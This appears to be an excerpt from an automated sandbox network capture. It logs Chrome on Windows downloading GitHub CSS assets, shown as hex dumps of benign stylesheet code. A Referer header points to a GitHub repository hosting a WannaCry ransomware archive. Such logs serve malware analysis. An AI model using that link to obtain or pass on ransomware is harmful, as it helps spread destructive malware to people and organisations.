                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 309ca4fa371f5a90563a9a71ed3fe141f2cf09b6
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 2e 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 69 6e 76 65 72 73 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6f 6e 45 6d 70 68 61 73 69 73 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6f 6e 2d 65 6d 70 68 61 73 69 73 29 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 67 2d 67 72 61 79 2d 32 2c 2e 62 67 2d 67 72 61 79 2d 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72 2d 6e 65 75 74 72 61 6c 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 6e 65 75 74 72 61 6c 2d 6d 75 74 65 64 29 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6c 6f 72 2d 74 65 78 74 2d 77 68 69 74 65 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 77 68 69 74 65 2c 20 76 61
                                                                                      Data Ascii: .color-border-inverse{border-color:var(--fgColor-onEmphasis, var(--color-fg-on-emphasis)) !important}.bg-gray-2,.bg-gray-3{background-color:var(--bgColor-neutral-muted, var(--color-neutral-muted)) !important}.color-text-white{color:var(--fgColor-white, va
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 64 65 74 61 69 6c 73 2d 64 69 61 6c 6f 67 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6d 61 72 67 69 6e 3a 31 30 76 68 20 61 75 74 6f 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 35 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 30 25 29 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 3b 6d 61 78 2d 68 65 69 67 68 74 3a 38 30 76 68 3b 6d 61 78 2d 77 69 64 74 68 3a 39 30 76 77 3b 77 69 64 74 68 3a 34 34 38 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 2e 75 73 65 72 2d 73 65 6c 65 63 74 2d 63 6f 6e 74 61 69 6e 7b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 63 6f 6e 74 61 69 6e 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 63 6f 6e 74 61 69 6e 7d 2e 61 6a 61 78 2d 70 61 67 69 6e 61 74 69 6f
                                                                                      Data Ascii: oration:none}details-dialog{position:fixed;margin:10vh auto;top:0;left:50%;transform:translateX(-50%);z-index:999;max-height:80vh;max-width:90vw;width:448px;overflow:auto}.user-select-contain{-webkit-user-select:contain;user-select:contain}.ajax-paginatio
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 64 65 72 2d 73 65 61 72 63 68 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 48 65 61 64 65 72 4d 65 6e 75 2d 2d 6c 6f 67 67 65 64 2d 6f 75 74 20 2e 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 62 61 73 65 2d 74 65 78 74 2d 77 65 69 67 68 74 2d 73 65 6d 69 62 6f 6c 64 2c 20 36 30 30 29 7d 7d 2e 48 65 61 64 65 72 4d 65 6e 75 2d 2d 6c 6f 67 67 65 64 2d 6f 75 74 20 2e 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 7b 74 6f 70 3a 31 30 30 25 7d 2e 48 65 61 64 65 72 4d 65 6e 75 2d 2d 6c 6f 67 67 65 64 2d 6f 75 74 20 2e 68 65 61 64 65 72 2d 73 65 61 72 63 68 2d 6b 65 79 2d 73 6c 61 73 68 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 20 21 69 6d 70 6f 72
                                                                                      Data Ascii: der-search{margin-right:0 !important}.HeaderMenu--logged-out .HeaderMenu-link{font-weight:var(--base-text-weight-semibold, 600)}}.HeaderMenu--logged-out .jump-to-suggestions{top:100%}.HeaderMenu--logged-out .header-search-key-slash{margin-right:8px !impor
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 77 69 64 74 68 3a 31 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 61 63 74 69 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 2d 69 6e 6c 69 6e 65 2d 64 69 76 69 64 65 72 29 29 7d 2e 41 63 74 69 6f 6e 4c 69 73 74 2d 2d 74 72 65 65 20 2e 41 63 74 69 6f 6e 4c 69 73 74 2d 69 74 65 6d 2d 2d 68 61 73 53 75 62 49 74 65 6d 3a 6e 6f 74 28 5b 61 72 69 61 2d 6c 65 76 65 6c 3d 22 31 22 5d 29 3e 2e 41 63 74 69 6f 6e 4c 69 73 74 2d 2d 73 75 62 47 72 6f 75 70 3a 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 63 61 6c 63 28 38 70 78 20 2a 20 28 76 61 72 28 2d 2d
                                                                                      Data Ascii: width:1px;height:100%;content:"";background:var(--borderColor-muted, var(--color-action-list-item-inline-divider))}.ActionList--tree .ActionList-item--hasSubItem:not([aria-level="1"])>.ActionList--subGroup::before{position:absolute;left:calc(8px * (var(--
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 39 70 78 20 31 30 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 73 75 62 74 6c 65 29 29 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 62 6f 72 64 65 72 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 64 65 66 61 75 6c 74 29 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 36 70 78 20 36 70 78 20 30
                                                                                      Data Ascii: display:block;padding:9px 10px 10px;margin:0;font-size:14px;line-height:17px;background-color:var(--bgColor-muted, var(--color-canvas-subtle));border:1px solid var(--borderColor-default, var(--color-border-default));border-bottom:0;border-radius:6px 6px 0
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 69 70 74 69 6f 6e 2d 77 61 72 6e 69 6e 67 2c 2e 73 65 6c 65 63 74 2d 6d 65 6e 75 2d 69 74 65 6d 5b 61 72 69 61 2d 73 65 6c 65 63 74 65 64 3d 74 72 75 65 5d 3a 68 6f 76 65 72 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 2c 2e 73 65 6c 65 63 74 2d 6d 65 6e 75 2d 69 74 65 6d 5b 61 72 69 61 2d 73 65 6c 65 63 74 65 64 3d 74 72 75 65 5d 3a 68 6f 76 65 72 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 2d 77 61 72 6e 69 6e 67 2c 2e 73 65 6c 65 63 74 2d 6d 65 6e 75 2d 69 74 65 6d 5b 61 72 69 61 2d 73 65 6c 65 63 74 65 64 3d 74 72 75 65 5d 3a 66 6f 63 75 73 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 2c 2e 73 65 6c 65 63 74 2d 6d 65 6e 75 2d 69 74 65 6d 5b 61 72 69 61 2d 73 65 6c 65 63 74 65 64 3d 74 72 75 65 5d 3a 66 6f 63 75 73 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 2d 77 61 72 6e
                                                                                      Data Ascii: iption-warning,.select-menu-item[aria-selected=true]:hover .description,.select-menu-item[aria-selected=true]:hover .description-warning,.select-menu-item[aria-selected=true]:focus .description,.select-menu-item[aria-selected=true]:focus .description-warn
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 29 29 7d 2e 63 6f 6d 6d 69 74 2d 61 75 74 68 6f 72 2d 73 65 63 74 69 6f 6e 20 73 70 61 6e 2e 75 73 65 72 2d 6d 65 6e 74 69 6f 6e 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 62 61 73 65 2d 74 65 78 74 2d 77 65 69 67 68 74 2d 6e 6f 72 6d 61 6c 2c 20 34 30 30 29 7d 2e 63 6f 6d 6d 69 74 2d 74 65 61 73 65 2d 73 68 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 6f 6e 74 53 74 61 63 6b 2d 6d 6f 6e 6f 73 70 61 63 65 2c 20 75 69 2d 6d 6f 6e 6f 73 70 61 63 65 2c 20 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 20 53 46 20 4d 6f 6e 6f
                                                                                      Data Ascii: or:var(--fgColor-default, var(--color-fg-default))}.commit-author-section span.user-mention{font-weight:var(--base-text-weight-normal, 400)}.commit-tease-sha{display:inline-block;font-family:var(--fontStack-monospace, ui-monospace, SFMono-Regular, SF Mono
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 29 29 7d 2e 73 75 62 6d 6f 64 75 6c 65 2d 64 69 66 66 2d 73 74 61 74 73 20 2e 6f 63 74 69 63 6f 6e 2d 64 69 66 66 2d 6d 6f 64 69 66 69 65 64 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 61 74 74 65 6e 74 69 6f 6e 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 61 74 74 65 6e 74 69 6f 6e 2d 66 67 29 29 7d 2e 73 75 62 6d 6f 64 75 6c 65 2d 64 69 66 66 2d 73 74 61 74 73 20 2e 6f 63 74 69 63 6f 6e 2d 64 69 66 66 2d 61 64 64 65 64 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 73 75 63 63 65 73 73 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 75 63 63 65 73 73 2d 66 67 29 29 7d 2e 42 6c 6f 62 54 6f 6f 6c 62 61 72 7b
                                                                                      Data Ascii: ar(--fgColor-muted, var(--color-fg-muted))}.submodule-diff-stats .octicon-diff-modified{color:var(--fgColor-attention, var(--color-attention-fg))}.submodule-diff-stats .octicon-diff-added{color:var(--fgColor-success, var(--color-success-fg))}.BlobToolbar{
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 6d 65 6e 74 7b 62 6f 72 64 65 72 3a 30 7d 2e 63 6f 6d 70 6f 73 65 72 2e 63 6f 6d 70 6f 73 65 72 2d 72 65 73 70 6f 6e 73 69 76 65 20 2e 74 69 6d 65 6c 69 6e 65 2d 63 6f 6d 6d 65 6e 74 3a 3a 62 65 66 6f 72 65 2c 2e 63 6f 6d 70 6f 73 65 72 2e 63 6f 6d 70 6f 73 65 72 2d 72 65 73 70 6f 6e 73 69 76 65 20 2e 74 69 6d 65 6c 69 6e 65 2d 63 6f 6d 6d 65 6e 74 3a 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 6f 6d 70 6f 73 65 72 2e 63 6f 6d 70 6f 73 65 72 2d 72 65 73 70 6f 6e 73 69 76 65 20 2e 70 72 65 76 69 65 77 61 62 6c 65 2d 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 20 2e 77 72 69 74 65 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 7d 40 6d 65 64 69 61 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 7b 2e 63 6f 6d 70 6f 73 65 72 2e 63 6f
                                                                                      Data Ascii: ment{border:0}.composer.composer-responsive .timeline-comment::before,.composer.composer-responsive .timeline-comment::after{display:none}.composer.composer-responsive .previewable-comment-form .write-content{margin:0}@media(min-width: 768px){.composer.co
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 6f 6e 67 2e 63 68 61 6e 67 65 64 5f 74 61 67 2c 62 2e 63 68 61 6e 67 65 64 5f 74 61 67 2c 69 2e 63 68 61 6e 67 65 64 5f 74 61 67 2c 63 6f 64 65 2e 63 68 61 6e 67 65 64 5f 74 61 67 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 64 6f 74 74 65 64 20 76 61 72 28 2d 2d 62 6f 72 64 65 72 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 64 65 66 61 75 6c 74 29 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 61 2e 61 64 64 65 64 5f 68 72 65 66 2c 61 2e 63 68 61 6e 67 65 64 5f 68 72 65 66 2c 73 70 61 6e 2e 72 65 6d 6f 76 65 64 5f 68 72 65 66 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 64 6f 74 74 65 64 20 76 61 72 28 2d 2d 62 6f 72 64 65 72 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c
                                                                                      Data Ascii: ong.changed_tag,b.changed_tag,i.changed_tag,code.changed_tag{border-bottom:1px dotted var(--borderColor-default, var(--color-border-default));border-radius:0}a.added_href,a.changed_href,span.removed_href{border-bottom:1px dotted var(--borderColor-default,


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.1649707185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC657OUTGET /assets/primer-f3607eccaaae.css HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: text/css,*/*;q=0.1
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: style
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:21 UTC674INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 355399
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: text/css
                                                                                      Last-Modified: Tue, 19 Mar 2024 18:00:01 GMT
                                                                                      ETag: 0x8DC483E6637B878
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 325842
                                                                                      X-Served-By: cache-iad-kjyo7100103-IAD, cache-lga21930-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 783, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 8bececefe6bd8cb34c345d089f97453e8bfab394
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 3a 72 6f 6f 74 7b 2d 2d 68 30 30 2d 73 69 7a 65 2d 6d 6f 62 69 6c 65 3a 20 32 2e 35 72 65 6d 3b 2d 2d 68 30 2d 73 69 7a 65 2d 6d 6f 62 69 6c 65 3a 20 32 72 65 6d 3b 2d 2d 68 31 2d 73 69 7a 65 2d 6d 6f 62 69 6c 65 3a 20 31 2e 36 32 35 72 65 6d 3b 2d 2d 68 32 2d 73 69 7a 65 2d 6d 6f 62 69 6c 65 3a 20 31 2e 33 37 35 72 65 6d 3b 2d 2d 68 33 2d 73 69 7a 65 2d 6d 6f 62 69 6c 65 3a 20 31 2e 31 32 35 72 65 6d 3b 2d 2d 68 30 30 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 2d 2d 68 30 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 2d 2d 68 31 2d 73 69 7a 65 3a 20 32 72 65 6d 3b 2d 2d 68 32 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 2d 2d 68 33 2d 73 69 7a 65 3a 20 31 2e 32 35 72 65 6d 3b 2d 2d 68 34 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 2d 2d 68 35 2d 73 69 7a 65 3a 20 30 2e 38 37
                                                                                      Data Ascii: :root{--h00-size-mobile: 2.5rem;--h0-size-mobile: 2rem;--h1-size-mobile: 1.625rem;--h2-size-mobile: 1.375rem;--h3-size-mobile: 1.125rem;--h00-size: 3rem;--h0-size: 2.5rem;--h1-size: 2rem;--h2-size: 1.5rem;--h3-size: 1.25rem;--h4-size: 1rem;--h5-size: 0.87
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 61 72 28 2d 2d 73 68 61 64 6f 77 2d 72 65 73 74 69 6e 67 2d 73 6d 61 6c 6c 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 68 6f 76 65 72 2d 73 68 61 64 6f 77 29 29 2c 76 61 72 28 2d 2d 73 68 61 64 6f 77 2d 68 69 67 68 6c 69 67 68 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 68 6f 76 65 72 2d 69 6e 73 65 74 2d 73 68 61 64 6f 77 29 29 7d 2e 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 20 2e 43 6f 75 6e 74 65 72 2c 5b 6f 70 65 6e 5d 3e 2e 62 74 6e 2d 64 61 6e 67 65 72 20 2e 43 6f 75 6e 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 43 6f 75 6e 74 65 72 2d 64 61 6e 67 65 72 2d 62 67 43 6f 6c 6f 72 2d 68 6f 76 65 72 2c 20 76 61 72 28 2d 2d 63 6f
                                                                                      Data Ascii: ar(--shadow-resting-small, var(--color-btn-danger-hover-shadow)),var(--shadow-highlight, var(--color-btn-danger-hover-inset-shadow))}.btn-danger:hover .Counter,[open]>.btn-danger .Counter{background-color:var(--buttonCounter-danger-bgColor-hover, var(--co
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 64 65 66 61 75 6c 74 29 29 7d 2e 66 6f 72 6d 2d 67 72 6f 75 70 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 69 6e 73 65 74 29 29 7d 2e 66 6f 72 6d 2d 67 72 6f 75 70 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72
                                                                                      Data Ascii: color:var(--bgColor-default, var(--color-canvas-default))}.form-group .form-control{width:440px;max-width:100%;margin-right:5px;background-color:var(--bgColor-muted, var(--color-canvas-inset))}.form-group .form-control:focus{background-color:var(--bgColor
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 6e 2d 6c 65 66 74 3a 31 36 2e 36 36 36 36 36 36 36 36 25 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 34 2e 39 39 39 39 39 39 39 39 25 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 33 32 25 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 36 36 35 25 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 39 2e 39 39 39 39 39 39 39 38 25 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e
                                                                                      Data Ascii: n-left:16.66666666% !important}.offset-md-3{margin-left:24.99999999% !important}.offset-md-4{margin-left:33.33333332% !important}.offset-md-5{margin-left:41.66666665% !important}.offset-md-6{margin-left:49.99999998% !important}.offset-md-7{margin-left:58.
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 69 76 69 64 65 72 2c 3a 6e 6f 74 28 2e 53 74 61 63 6b 2d 2d 64 69 72 2d 69 6e 6c 69 6e 65 2d 77 68 65 6e 57 69 64 65 29 3e 2e 53 74 61 63 6b 2d 69 74 65 6d 3e 2e 53 74 61 63 6b 2d 64 69 76 69 64 65 72 7b 62 6f 72 64 65 72 2d 62 6c 6f 63 6b 2d 65 6e 64 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 57 69 64 74 68 2d 74 68 69 6e 2c 20 31 70 78 29 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 53 74 61 63 6b 2d 64 69 76 69 64 65 72 2d 63 6f 6c 6f 72 29 3b 69 6e 6c 69 6e 65 2d 73 69 7a 65 3a 61 75 74 6f 3b 62 6c 6f 63 6b 2d 73 69 7a 65 3a 30 7d 2e 53 74 61 63 6b 2d 2d 64 69 72 2d 69 6e 6c 69 6e 65 2d 77 68 65 6e 57 69 64 65 3e 2e 53 74 61 63 6b 2d 64 69 76 69 64 65 72 2c 2e 53 74 61 63 6b 2d 2d 64 69 72 2d 69 6e 6c 69 6e 65 2d 77 68 65 6e 57 69 64 65 3e 2e 53 74 61 63 6b 2d
                                                                                      Data Ascii: ivider,:not(.Stack--dir-inline-whenWide)>.Stack-item>.Stack-divider{border-block-end:var(--borderWidth-thin, 1px) solid var(--Stack-divider-color);inline-size:auto;block-size:0}.Stack--dir-inline-whenWide>.Stack-divider,.Stack--dir-inline-whenWide>.Stack-
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 73 2d 73 6d 61 6c 6c 2c 20 34 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 6f 75 6e 64 65 64 2d 32 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 52 61 64 69 75 73 2d 6d 65 64 69 75 6d 2c 20 36 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 6f 75 6e 64 65 64 2d 33 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 52 61 64 69 75 73 2d 6c 61 72 67 65 2c 20 38 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 6f 75 6e 64 65 64 2d 74 6f 70 2d 30 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 6f 75 6e 64 65
                                                                                      Data Ascii: s-small, 4px) !important}.rounded-2{border-radius:var(--borderRadius-medium, 6px) !important}.rounded-3{border-radius:var(--borderRadius-large, 8px) !important}.rounded-top-0{border-top-left-radius:0 !important;border-top-right-radius:0 !important}.rounde
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 28 2d 2d 63 6f 6c 6f 72 2d 73 68 61 64 6f 77 2d 6d 65 64 69 75 6d 29 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6c 6f 72 2d 73 68 61 64 6f 77 2d 6c 61 72 67 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 76 61 72 28 2d 2d 73 68 61 64 6f 77 2d 66 6c 6f 61 74 69 6e 67 2d 6c 61 72 67 65 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 68 61 64 6f 77 2d 6c 61 72 67 65 29 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6c 6f 72 2d 73 68 61 64 6f 77 2d 65 78 74 72 61 2d 6c 61 72 67 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 76 61 72 28 2d 2d 73 68 61 64 6f 77 2d 66 6c 6f 61 74 69 6e 67 2d 78 6c 61 72 67 65 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 68 61 64 6f 77 2d 65 78 74 72 61 2d 6c 61 72 67 65 29 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 68 61 64 6f 77 2d 66 6c
                                                                                      Data Ascii: (--color-shadow-medium)) !important}.color-shadow-large{box-shadow:var(--shadow-floating-large, var(--color-shadow-large)) !important}.color-shadow-extra-large{box-shadow:var(--shadow-floating-xlarge, var(--color-shadow-extra-large)) !important}.shadow-fl
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 62 61 73 65 6c 69 6e 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 62 61 73 65 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 73 74 72 65 74 63 68 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 72 65 74 63 68 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c 65 78 2d 6c 67 2d 63 6f 6e 74 65 6e 74 2d 73 74 61 72 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c 65 78 2d 6c 67 2d 63 6f 6e 74 65 6e 74 2d 65 6e 64 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c 65 78 2d
                                                                                      Data Ascii: -items:center !important}.flex-lg-items-baseline{align-items:baseline !important}.flex-lg-items-stretch{align-items:stretch !important}.flex-lg-content-start{align-content:flex-start !important}.flex-lg-content-end{align-content:flex-end !important}.flex-
